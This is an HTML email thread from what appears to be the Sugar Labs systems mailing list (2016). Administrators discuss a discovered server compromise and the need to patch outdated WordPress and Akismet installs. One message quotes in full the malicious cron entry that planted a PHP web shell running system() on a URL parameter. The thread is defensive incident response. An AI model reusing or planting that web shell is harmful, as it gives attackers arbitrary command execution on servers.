<div dir="ltr">Let's shut it down for the time being. I've been updating the wiki but not my blog since the attack last year anyway.<div><br></div><div>-walter</div></div><div class="gmail_extra"><br><div class="gmail_quote">On Tue, Mar 1, 2016 at 7:57 PM, Bernie Innocenti <span dir="ltr"><<a href="mailto:bernie@codewiz.org" target="_blank">bernie@codewiz.org</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">+walter<br>
<br>
Can we appoint an official maintainer for <a href="http://walterbender.org" rel="noreferrer" target="_blank">walterbender.org</a>? Sorry for<br>
not stepping up myself, but I'm overwhelmed by work related things and<br>
trying to reduce my sysadmin load.<br>
<br>
On 03/01/2016 02:50 PM, Samuel Cantero wrote:<br>
> On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <<a href="mailto:bernie@codewiz.org">bernie@codewiz.org</a><br>
> <mailto:<a href="mailto:bernie@codewiz.org">bernie@codewiz.org</a>>> wrote:<br>
><br>
> On 02/25/2016 04:09 AM, Sebastian Silva wrote:<br>
> > Remember in June we had an incident with a broken Wordpress site.<br>
> > I switched to static generator since then.<br>
> ><br>
> > +1 on containers just learning more about them and finding them fascinating.<br>
> > Count me in on containerizing everything.<br>
> ><br>
> > I'm not aware of other wordpress sites. Maybe walter's blog?<br>
> > Wordpress is a PIA IMHO.<br>
><br>
> Yes, WP is riddled with security holes. Back in October, Samuel helped<br>
> Walter upgrade <a href="http://walterbender.org" rel="noreferrer" target="_blank">walterbender.org</a> <<a href="http://walterbender.org" rel="noreferrer" target="_blank">http://walterbender.org</a>> on<br>
> sunjammer. Samuel, can you confirm<br>
> that the WP instance now fully patched and locked down?<br>
><br>
><br>
> The WP version on <a href="http://walterbender.org" rel="noreferrer" target="_blank">walterbender.org</a> <<a href="http://walterbender.org" rel="noreferrer" target="_blank">http://walterbender.org</a>> site is<br>
> 4.3.1. The WP last version is 4.4.2. I have checked the WP change log<br>
> and we can find this:<br>
><br>
> 4.4.1 => WordPress versions 4.4 and earlier are affected by a cross-site<br>
> scripting vulnerability that could allow a site to be compromised.<br>
><br>
> 4.4.2 => WordPress versions 4.4.1 and earlier are affected by two<br>
> security issues: a possible SSRF for certain local URIs, and an open<br>
> redirection attack.<br>
><br>
> This site also uses the 2.5.9 akismet plugin. The last version is 3.1.7.<br>
> Significant information on the release notes:<br>
><br>
> * Pre-emptive security improvements to ensure that the Akismet plugin<br>
> can't be used by attackers to compromise a WordPress installation.<br>
> * Closes a potential XSS vulnerability.<br>
><br>
> Of course, every version has a lot of bug fixes. We definitely should<br>
> upgrade it and test nothing breaks <a href="http://walterbender.org" rel="noreferrer" target="_blank">walterbender.org</a><br>
> <<a href="http://walterbender.org" rel="noreferrer" target="_blank">http://walterbender.org</a>> site.<br>
><br>
> Who is in charge of upgrading the others WP sites?<br>
><br>
> Regards,<br>
><br>
> Samuel C.<br>
><br>
><br>
><br>
><br>
> > Regards,<br>
> > Sebastian<br>
> ><br>
> ><br>
> > On 25/02/16 04:47, Bernie Innocenti wrote:<br>
> >> While I was looking for cronjobs in /var/spool/cron/crontabs/, i<br>
> found<br>
> >> that www-data was executing commands like these:<br>
> >><br>
> >> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) ==<br>
> >> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);<br>
> >> @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php<br>
> >><br>
> >> Did you spot the system()? This executes arbitrary commands specified<br>
> >> via the "localtime" url parameter. Uh-oh.<br>
> >><br>
> >> There were about a dozen lines like the above, installing<br>
> .cache.php in<br>
> >> various virtualhosts. I kept a copy of the file in<br>
> >> /root/www-data.backdoor. The file was last written on Jun 23 2015,<br>
> >> which may correlate with the switch to the new website.<br>
> >><br>
> >> I cleared the mess and searched the logs for requests containing<br>
> >> "localtime", but couldn't find any. I wonder if they could filter the<br>
> >> logs, since they were previously writable by www-data.<br>
> >><br>
> >> Please watch out. We should ensure directories accessible over<br>
> http are<br>
> >> not writable by user www-data, especially those in which PHP and CGIs<br>
> >> are enabled.<br>
> >><br>
> >> Running several large sites under the same uid has always been a bad<br>
> >> security practice, and looking forward we should keep migrating<br>
> them to<br>
> >> properly isolated containers.<br>
> >><br>
> >> Finally, Wordpress is particularly dangerous and we should update and<br>
> >> harden all instances. Can someone please take care of this? I'll do<br>
> >> Mediawiki, which I know pretty well.<br>
> >><br>
> ><br>
><br>
><br>
> --<br>
> _ // Bernie Innocenti<br>
> \X/ <a href="http://codewiz.org" rel="noreferrer" target="_blank">http://codewiz.org</a><br>
> _______________________________________________<br>
> Systems mailing list<br>
> <a href="mailto:Systems@lists.sugarlabs.org">Systems@lists.sugarlabs.org</a> <mailto:<a href="mailto:Systems@lists.sugarlabs.org">Systems@lists.sugarlabs.org</a>><br>
> <a href="http://lists.sugarlabs.org/listinfo/systems" rel="noreferrer" target="_blank">http://lists.sugarlabs.org/listinfo/systems</a><br>
><br>
><br>
><br>
><br>
> _______________________________________________<br>
> Systems mailing list<br>
> <a href="mailto:Systems@lists.sugarlabs.org">Systems@lists.sugarlabs.org</a><br>
> <a href="http://lists.sugarlabs.org/listinfo/systems" rel="noreferrer" target="_blank">http://lists.sugarlabs.org/listinfo/systems</a><br>
><br>
<span class="HOEnZb"><font color="#888888"><br>
<br>
--<br>
_ // Bernie Innocenti<br>
\X/ <a href="http://codewiz.org" rel="noreferrer" target="_blank">http://codewiz.org</a><br>
</font></span></blockquote></div><br><br clear="all"><div><br></div>-- <br><div class="gmail_signature"><div dir="ltr"><div><font><font>Walter Bender</font></font><br><font><font>Sugar Labs</font></font></div><div><font><a href="http://www.sugarlabs.org" target="_blank"><font>http://www.sugarlabs.org</font></a></font><br><a href="http://www.sugarlabs.org" target="_blank"><font></font></a><br></div></div></div>
</div>